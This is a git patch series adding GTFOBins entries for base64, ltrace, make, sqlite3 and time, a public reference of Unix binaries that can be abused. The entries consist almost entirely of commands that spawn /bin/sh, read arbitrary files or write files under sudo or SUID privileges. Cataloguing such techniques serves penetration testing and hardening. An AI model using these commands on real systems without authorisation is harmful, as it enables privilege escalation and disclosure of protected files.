From 5fa7efbc1c23b11b8c5bc811357a5bd830eafa99 Mon Sep 17 00:00:00 2001
From: Dov Murik <dov.murik@gmail.com>
Date: Mon, 4 Jun 2018 10:21:53 +0000
Subject: [PATCH 1/6] Add base64, ltrace, make, sqlite3, time

---
 _gtfobins/base64.md  | 15 +++++++++++++++
 _gtfobins/ltrace.md  |  7 +++++++
 _gtfobins/make.md    | 23 +++++++++++++++++++++++
 _gtfobins/sqlite3.md | 27 +++++++++++++++++++++++++++
 _gtfobins/time.md    | 12 ++++++++++++
 5 files changed, 84 insertions(+)
 create mode 100644 _gtfobins/base64.md
 create mode 100644 _gtfobins/ltrace.md
 create mode 100644 _gtfobins/make.md
 create mode 100644 _gtfobins/sqlite3.md
 create mode 100644 _gtfobins/time.md

diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md
new file mode 100644
index 0000000..02e4f62
--- /dev/null
+++ b/_gtfobins/base64.md
@@ -0,0 +1,15 @@
+---
+functions:
+  sudo-enabled:
+    - code: |
+        LFILE=file_to_read
+        sudo base64 "$LFILE" | base64 -d
+  suid-enabled:
+    - code: |
+        LFILE=file_to_read
+        ./base64 "$LFILE" | base64 -d
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        base64 "$LFILE" | base64 -d
+---
diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md
new file mode 100644
index 0000000..f7b420b
--- /dev/null
+++ b/_gtfobins/ltrace.md
@@ -0,0 +1,7 @@
+---
+functions:
+  execute-interactive:
+    - code: ltrace -b -L /bin/sh
+  sudo-enabled:
+    - code: sudo ltrace -b -L /bin/sh
+---
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
new file mode 100644
index 0000000..fb38728
--- /dev/null
+++ b/_gtfobins/make.md
@@ -0,0 +1,23 @@
+---
+functions:
+  execute-interactive:
+    - code: |
+        COMMAND='/bin/sh 1>&2'
+        make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  execute-non-interactive:
+    - code: |
+        COMMAND=/usr/bin/id
+        make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  sudo-enabled:
+    - code: |
+        COMMAND=/usr/bin/id
+        sudo make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  suid-enabled:
+    - code: |
+        COMMAND=/usr/bin/id
+        ./make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  file-write:
+    - code: |
+        LFILE=file_to_write
+        make -s --eval="a := \$(file >$LFILE,data)" --eval='all:'
+---
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
new file mode 100644
index 0000000..6fa89ae
--- /dev/null
+++ b/_gtfobins/sqlite3.md
@@ -0,0 +1,27 @@
+---
+functions:
+  sudo-enabled:
+    - code: |
+        LFILE=file_to_read
+        sudo sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
+  suid-enabled:
+    - code: |
+        LFILE=file_to_read
+        ./sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
+---
diff --git a/_gtfobins/time.md b/_gtfobins/time.md
new file mode 100644
index 0000000..7530795
--- /dev/null
+++ b/_gtfobins/time.md
@@ -0,0 +1,12 @@
+---
+description: |
+  Note that the shell might have its own builtin time implementation, which may
+  behave differently than /usr/bin/time.
+functions:
+  execute-interactive:
+    - code: /usr/bin/time /bin/sh
+  sudo-enabled:
+    - code: sudo /usr/bin/time /bin/sh
+  suid-enabled:
+    - code: ./time /bin/sh -p
+---

From 323553f4b09e0ea1ce22aef0cc95677cd8f961d1 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Mon, 4 Jun 2018 14:59:57 +0200
Subject: [PATCH 2/6] Make base64 portable

---
 _gtfobins/base64.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md
index 02e4f62..2dd7844 100644
--- a/_gtfobins/base64.md
+++ b/_gtfobins/base64.md
@@ -3,13 +3,13 @@ functions:
   sudo-enabled:
     - code: |
         LFILE=file_to_read
-        sudo base64 "$LFILE" | base64 -d
+        sudo base64 "$LFILE" | base64 --decode
   suid-enabled:
     - code: |
         LFILE=file_to_read
-        ./base64 "$LFILE" | base64 -d
+        ./base64 "$LFILE" | base64 --decode
   file-read:
     - code: |
         LFILE=file_to_read
-        base64 "$LFILE" | base64 -d
+        base64 "$LFILE" | base64 --decode
 ---

From b2a2dccc82495deb8c3345d58cd9d969622d1d79 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Mon, 4 Jun 2018 17:16:57 +0200
Subject: [PATCH 3/6] Add execute-interactive to sqlite3

---
 _gtfobins/sqlite3.md | 22 ++++++++--------------
 1 file changed, 8 insertions(+), 14 deletions(-)

diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
index 6fa89ae..f9ad23f 100644
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@@ -1,21 +1,15 @@
 ---
 functions:
+  execute-interactive:
+    - code: sqlite3 /dev/null '.shell /bin/sh'
   sudo-enabled:
+    - code: sudo sqlite3 /dev/null '.shell /bin/sh'
+  suid-limited:
+    - code: ./sqlite3 /dev/null '.shell /bin/sh'
+  file-write:
     - code: |
-        LFILE=file_to_read
-        sudo sqlite3 << EOF
-        CREATE TABLE t(line TEXT);
-        .import $LFILE t
-        SELECT * FROM t;
-        EOF
-  suid-enabled:
-    - code: |
-        LFILE=file_to_read
-        ./sqlite3 << EOF
-        CREATE TABLE t(line TEXT);
-        .import $LFILE t
-        SELECT * FROM t;
-        EOF
+        LFILE=file_to_write
+        sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
   file-read:
     - code: |
         LFILE=file_to_read

From 4eff8b534fcded537ffd57dcd86af58ade708205 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Mon, 4 Jun 2018 17:21:24 +0200
Subject: [PATCH 4/6] Fix time description

---
 _gtfobins/time.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/_gtfobins/time.md b/_gtfobins/time.md
index 7530795..91c6290 100644
--- a/_gtfobins/time.md
+++ b/_gtfobins/time.md
@@ -1,7 +1,7 @@
 ---
 description: |
   Note that the shell might have its own builtin time implementation, which may
-  behave differently than /usr/bin/time.
+  behave differently than` /usr/bin/time`, hence the absolute path.
 functions:
   execute-interactive:
     - code: /usr/bin/time /bin/sh

From c31a8a1b6b5338d570f5a4a034c4f3b385dceda9 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Mon, 4 Jun 2018 18:28:58 +0200
Subject: [PATCH 5/6] Simplify make

---
 _gtfobins/make.md | 18 +++++++-----------
 1 file changed, 7 insertions(+), 11 deletions(-)

diff --git a/_gtfobins/make.md b/_gtfobins/make.md
index fb38728..1dc4451 100644
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@@ -2,22 +2,18 @@
 functions:
   execute-interactive:
     - code: |
-        COMMAND='/bin/sh 1>&2'
-        make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
-  execute-non-interactive:
-    - code: |
-        COMMAND=/usr/bin/id
-        make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+        COMMAND='/bin/sh'
+        make -s --eval=$'x:\n\t-'"$COMMAND"
   sudo-enabled:
     - code: |
-        COMMAND=/usr/bin/id
-        sudo make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+        COMMAND='/bin/sh'
+        sudo make -s --eval=$'x:\n\t-'"$COMMAND"
   suid-enabled:
     - code: |
-        COMMAND=/usr/bin/id
-        ./make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+        COMMAND='/bin/sh'
+        ./make -s --eval=$'x:\n\t-'"$COMMAND"
   file-write:
     - code: |
         LFILE=file_to_write
-        make -s --eval="a := \$(file >$LFILE,data)" --eval='all:'
+        make -s --eval="\$(file >$LFILE,data)" .
 ---

From 81f12399fe5c9c524c24c14891432181a87354e4 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Mon, 4 Jun 2018 18:59:07 +0200
Subject: [PATCH 6/6] Add compatibility notice in make

---
 _gtfobins/make.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/_gtfobins/make.md b/_gtfobins/make.md
index 1dc4451..c5ab66a 100644
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@@ -1,4 +1,18 @@
 ---
+description: |
+  All these examples only work with GNU `make` due to the lack of support of the
+  `--eval` flag. The same can be achieved by using a proper `Makefile` of by
+  passing the content via stdin, that is:
+
+  ```
+  make -s --eval=<commands>
+  ```
+
+  becomes:
+
+  ```
+  make -s -f <(echo <commands>)
+  ```
 functions:
   execute-interactive:
     - code: |